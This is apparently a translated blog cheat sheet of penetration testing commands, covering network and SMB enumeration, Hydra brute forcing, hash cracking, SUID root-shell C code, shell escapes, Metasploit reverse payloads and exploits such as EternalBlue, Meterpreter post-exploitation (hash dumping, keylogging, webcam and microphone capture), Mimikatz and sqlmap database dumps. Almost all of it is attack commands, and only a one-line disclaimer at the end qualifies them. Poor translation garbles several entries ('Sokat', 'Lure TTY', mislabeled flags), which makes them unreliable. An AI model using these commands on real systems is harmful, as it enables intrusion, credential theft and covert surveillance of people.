A very comprehensive penetration testing memo: including tools, techniques and techniques [worth collecting]

Share with heart, just to give you the best learning tutorial If you think the article is good, welcome to continue learning This memo will help you gain a comprehensive understanding of penetration testing and is your first choice for quickly learning, referencing, and becoming familiar with commands and techniques in the field of penetration testing. Whether you're a newbie or an experienced penetration tester, this cheat sheet has everything you need to navigate the world of security assessments. Explore tools, methods, and insights for effective reconnaissance, enumeration, privilege escalation, password cracking, exploit research, and more. Improve your penetration testing skills with this valuable resource!

Reconnaissance and enumeration

NMAP command

Order	                       describe
nmap -v -sS -A -T4 target	Nmap detailed scans, running synchronized stealth, T4 timings, OS and service version information, traceroute and service-specific scripts.
ping sweep sudo nmap -pn target	Perform a ping scan of the target network to view all available IPs.
nmap -v -sS -p–A -T4 target	As above, but scans all TCP ports (takes longer).
nmap -v -sU -sS -p- -A -T4 target	As above, but scans all TCP ports and UDP scans (takes longer).
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X	Nmap script for scanning vulnerable SMB servers.
nmap localhost	Displays all ports currently in use.
ls /usr/share/nmap/scripts/* | grep ftp	Search for keywords in nmap script.

SMB enumeration

In computer networks, Server Message Block (SMB) operates as an application layer network protocol and is primarily used to provide shared access to files, printers, and serial ports.

Order	describe
nbtscan 192.168.1.0/24	Discover Windows/Samba servers on a subnet, find Windows MAC addresses, netbios names and discover client workgroups/domains.
enum4linux -a target-ip	Do everything, run all options except dictionary-based share name guessing (find Windows client domains/workgroups).
smbclient -L target-ip	Lists all SMB shares available on the target computer.
smbget -R smb://target-ip/share	Recursively download files from an SMB share.
rpcclient -U "" target-ip	Use an empty username to connect to the SMB server and list the available commands.
showmount -e target-ip	Displays the available shares on the target computer, useful for NFS.
smbmap -H target-ip	Displays the target's sharing permissions.
smbstatus	Lists current Samba connections. Useful when running on the target machine.

Other host discovery methods

Alternative host discovery methods that do not use Nmap.

Order	describe
netdiscover -r 192.168.1.0/24	Discover IPs, MAC addresses, and MAC providers on the subnet from ARP.
arp-scan --interface=eth0 192.168.1.0/24	ARP scan to discover hosts on the local network.
fping -g 192.168.1.0/24	Send ICMP echo requests to multiple hosts to check if they are active.
masscan -p1-65535,U:1-65535 192.168.1.0/24 --rate=1000	Scans all ports at a high rate, useful for initial discovery.

python local webserver

Python local web server commands to facilitate shell and vulnerability exploitation on attack machines.

Order	describe
python -m SimpleHTTPServer 80	Runs a basic HTTP server, perfect for providing a shell etc.
python3 -m http.server 80	Use Python 3 to run a basic HTTP server.
python -m SimpleHTTPServer 80 --bind 192.168.1.2	Bind the server to a specific IP address.

Mount file share

How to mount NFS/CIFS, Windows and Linux file shares.

Order	describe
mount 192.168.1.1:/vol/share /mnt/nfs	Mount the NFS share to. /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs	Install Windows CIFS/SMB shares on Linux. /mnt/cifs
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no	Mount a Windows share on Windows from the command line.
apt-get install smb4k -y	Install smb4k on Kali, a useful Linux GUI for browsing SMB shares.
smbclient -L //192.168.1.X -U username	Lists SMB shares available on Windows computers.

basic fingerprint

Device fingerprinting or machine fingerprinting or browser fingerprinting is information collected about a remote computing device for identification purposes.

Order	describe
nc -v 192.168.1.1 25	Basic version control/fingerprinting via displayed banner.
telnet 192.168.1.1 25	Another approach to basic version control/fingerprinting.
curl -I 192.168.1.1	Gets the HTTP headers used to fingerprint the web server.
nmap -O 192.168.1.1	Use Nmap to perform operating system detection.
whatweb 192.168.1.1	Determine the web technologies used on the target.

SNMP enumeration

SNMP enumeration is the process of enumerating user accounts on a target system using SNMP.

Order	describe
snmpcheck -t 192.168.1.X -c public	SNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1	SNMP enumeration
snmpenum -t 192.168.1.X	SNMP enumeration
onesixtyone -c names -i hosts	SNMP enumeration
snmpbulkwalk -v2c -c public -Cn0 -Cr10 192.168.1.X	Bulk SNMP enumeration

DNS zone transfer

Order	describe
nslookup -> set type=any -> ls -d blah.com	Windows DNS zone transfer
dig axfr blah.com@ _	Linux DNS zone transfer
host -l blah.com _	Another Linux DNS zone transfer method

DNSRecon

DNSRecon provides the ability to perform various DNS enumeration tasks.

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP/HTTPS Webserver Enumeration

Order	describe
nikto -h 192.168.1.1	Perform a nikto scan on the target
dirbuster	Configuring via GUI, CLI input doesn't work most of the time
gobuster dir -u 192.168.1.1-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt	Directory brute force and saboteurs
wpscan --url 192.168.1.1	WordPress Vulnerability Scanner
joomscan -u 192.168.1.1	Jomla Vulnerability Scanner
uniscan -u 192.168.1.1-qweds	Uniscan automated vulnerability scanner
curl -I 192.168.1.1	Using curl to get HTTP headers
nmap -p80 --script http-enum 192.168.1.1	Nmap script for HTTP enumeration
whatweb 192.168.1.1	Identify the technologies used on the website
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 192.168.1.1/FUZZ	Fuzzing HTTP with wfuzz

Packet inspection

Order	describe
tcpdump tcp port 80 -w output.pcap -i eth0	Capture packets on port 80
'tcpdump -i eth0 'port 443 and (tcp-syn	tcp-ack)! =0''
wireshark -k -i <interface>	Open Wireshark on a specific interface
tshark -i eth0 -f "tcp port 80"	Use tshark to capture packets on port 80

Username enumeration

SMB user enumeration

Order	describe
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX	Enumerate users from SMB
ridenum.py 192.168.XXX.XXX500 50000 dict.txt	RID period SMB/enumerate users from SMB
enum4linux -U 192.168.XXX.XXX	Enumerate SMB usernames using enum4linux

SNMP user enumeration

Order	describe
'snmpwalk public -v1 192.168.X.XXX1	Grepp77.1.2.25
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX	Enumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254-oG snmp_results.txt	Search for SNMP servers with nmap, grepable output

password

word list

Order	describe
/usr/share/wordlists	Kali word list
wget 1000000.txt	Download the hot word list from GitHub

Brute force cracking service

Hydra

FTP brute force cracking

Order	describe
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXftp -V	Hydra FTP Brute Force

POP3 Brute Force

Order	describe
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXpop3 -V	Hydra POP3 Brute Force

SMTP brute force cracking

Order	describe
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXXsmtp -V	Hydra SMTP Brute Force

SSH brute force cracking

Order	describe
hydra -l root -P /usr/share/wordlistsnmap.lst 192.168.X.XXXssh	Hydra SSH Brute Force

Used to limit concurrent connections, for example:-t-t 15

Password cracking

John The Ripper – JTR

Order	describe
john –wordlist=/usr/share/wordlists/rockyou.txt hashes	JTR password cracking
john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txt	JTR forces the use of word lists for decryption cracking
john –format=descrypt hash –show	JTR forced decryption brute force cracking

Hashcat

Order	describe
hashcat -m 0 -a 0 hash.txt wordlist.txt	Hashcat MD5 Crack
hashcat -m 1000 -a 0 hash.txt wordlist.txt	Hashcat NTLM Crack

Exploit Research

Order	describe
'Search window 2003	grep -i local'
site: exploit-db.comexploit kernel <= 3	Google search for kernel vulnerabilities 
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*	Searching for Windows 7 vulnerabilities in Metasploit modules
msfconsole -q -x "search name:windows type:exploit"	Search Metasploit for Windows exploits

Compilation vulnerability

Determine if C code is for Windows or Linux

head File	operating system
process.h, string.h, winbase.h, windows.h, winsock2.h	window
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h	Linux directory

Building an exploit for GCC

Order	describe
gcc -o exploit exploit.c	Basic GCC compilation
gcc -Wall -Wextra exploit.c -o exploit	Compile with all warnings and extras

GCC compilation 64-bit vulnerability on 32Bit Kali

Order	describe
gcc -m32 exploit.c -o exploit	Cross-compiling 64-bit binaries on 32-bit Linux

Compile Windows .exe on Linux

Order	describe
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe	Compile Windows .exe on Linux
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe	Compile 64-bit Windows .exe on Linux

suid binary

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Building SUID shell binaries

Order	describe
gcc -o suid suid.c	Compile SUID shell
gcc -m32 -o suid suid.c	Compiling a 32-bit SUID shell

TTY shell

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

Generate an interactive sh shell

/bin/sh -i

Generate Perl TTY shell

perl -e 'exec "/bin/sh";'

Generate ruby ​​TTY shell

ruby -e 'exec "/bin/sh"'

Generate Lure TTY Shell

lua -e 'os.execute("/bin/sh")'

Generate TTY shell from Vi

:!bash

Generate TTY shell from NMAP

!sh

Generate TTY shell from awk

awk 'BEGIN {system("/bin/sh")}'

Generate TTY shell from Sokat

socat file:tty,raw,echo=0 tcp-listen:4444

Metasploit

instrument payload

Windows reverse meter payload

Windows reverse meter payload

set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp
set ViewOnly false

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp

Android reverse meter payload

set payload android/meterpreter/reverse_tcp

Instrument Cheat Sheet

Order	describe
upload file c:\\windows	Upload file to window target
download c:\\windows\\repair\\sam /tmp	Download file from windows target
execute -fc:\\windows\temp\exploit.exe	Run the .exe on the target
execute -f cmd -c	Create new channel using cmd shell
PS	Show process
shell	Get the shell on the target
getsystem	Try elevating privileges on the target
hashdump	Dump hash on target
portfwd add -l 3389 -p 3389 -r target	Create a port forwarded to the target computer
portfwd delete –l 3389 –p 3389 –r target	Remove port forwarding
screenshot	Capture a screenshot of the target computer
keyscan_start	Start keylogger
keyscan_dump	Dump collected keystrokes
webcam_snap	Take a webcam snapshot
record_mic	Recording microphone
enum_chrome	Enumerate Chrome browser data

Common metamodules

Remote Windows Metasploit Modules (exploits)

Order	describe
use exploit/windows/smb/ms08_067_netapi	MS08_067 Windows 2k, XP, 2003 remote exploit
use exploit/windows/dcerpc/ms06_040_netapi	MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index	MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Attack
use exploit/windows/smb/ms17_010_eternalblue	MS17_010 Eternal Blue SMB remote window kernel pool is damaged

Local Windows Metasploit Modules (exploits)

Order	describe
use exploit/windows/local/bypassuac	Bypass UAC + set target + architecture on Windows 7, x86/64
use exploit/windows/local/ms10_015_kitrap0d	MS10_015 Kitrap0d local privilege escalation

Auxiliary metamodule

Order	describe
use auxiliary/scanner/http/dir_scanner	Metasploit HTTP Directory Scanner
use auxiliary/scanner/http/jboss_vulnscan	Metasploit JBOSS Vulnerability Scanner
use auxiliary/scanner/mssql/mssql_login	Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version	Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login	Metasploit Oracle Login Module

Metasploit Powershell Modules

Order	describe
use exploit/multi/script/web_delivery	Metasploit Power Shell Payload Delivery Module
post/windows/manage/powershell/exec_powershell	Upload and run Powershell scripts through sessions
use exploit/multi/http/jboss_maindeployer	Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload	Metasploit MSSQL payload

Post-exploit window meta-module

Order	describe
run post/windows/gather/win_privs	Metasploit displays the current user's permissions
use post/windows/gather/credentials/gpp	Metasploit scrapes GPP saved passwords
load mimikatz -> wdigest	Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum	Identifies other computers to which the provided domain user has administrative access

Networking

TTL fingerprint recognition

Operating system	TTL size
window	             128
Linux directory    	 64
Solaris	             255
Cisco/Network	     255

Cisco IOS commands

Order	describe
enable	Enter enable mode
conf t	Abbreviation, configuration terminal
(config)# interface fa0/0	Configure Fast Ethernet 0/0
(config-if)#ip addr 0.0.0.0 255.255.255.255	Add IP to fa0/0
(config-if)# line vty 0 4	Configure vty lines
(config-line)# login	Cisco sets remote login password
(config-line)# password YOUR-PASSWORD	Set remote login password
# show running-config	Displays the running configuration loaded in memory
# show startup-config	Show startup configuration
# show version	Show Cisco IOS version
# show session	Show open sessions
#showipinterface	show network interface
# show interface e0	Show detailed interface information
#showiproute	show route
# show access-lists	Show access list
# dir file systems	Show available files
# dir all-filesystems	File information
# dir /all	Show deleted files
# terminal length 0	Unlimited terminal output
# copy running-config tftp	Copy the running configuration to the tftp server
# copy running-config startup-config	Copy startup configuration to running configuration

Cryptography

Hash length

hash	size
MD5	16 bytes
SHA-1	20 bytes
SHA-256	32 bytes
SHA-512	64 bytes

Hash example

hash	example
MD5 hash example	8743b52063cd84097a65d1633f5c74f5
SHA1 hash example	B89EAAC7E61417341b710b727768294d0e6a277b
SHA-256	127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
SHA-512	82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f

SQLMap example

Order	describe
sqlmap -u meh.com–forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3	Automatic sqlmap scanning
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read="/var/www/blah.php"	Targeted sqlmap scanning
sqlmap -u " meh.com/meh.php? " –dbms=mysql –tech=U –random-agent –dump	Scan URLs for federation + error based injection with MySQL backend and use random user agent + database dump
sqlmap -o -u " meh.com/form/"-forms	SQLMap inspection form for injection
sqlmap -o -u " meh/vuln-form" –forms -D database-name -T users –dump	SQLMap dump and cracked hash of table user on database name

This article is only for technology sharing and should not be used for illegal purposes. If you are interested in the software or technology in this article, please feel free to communicate.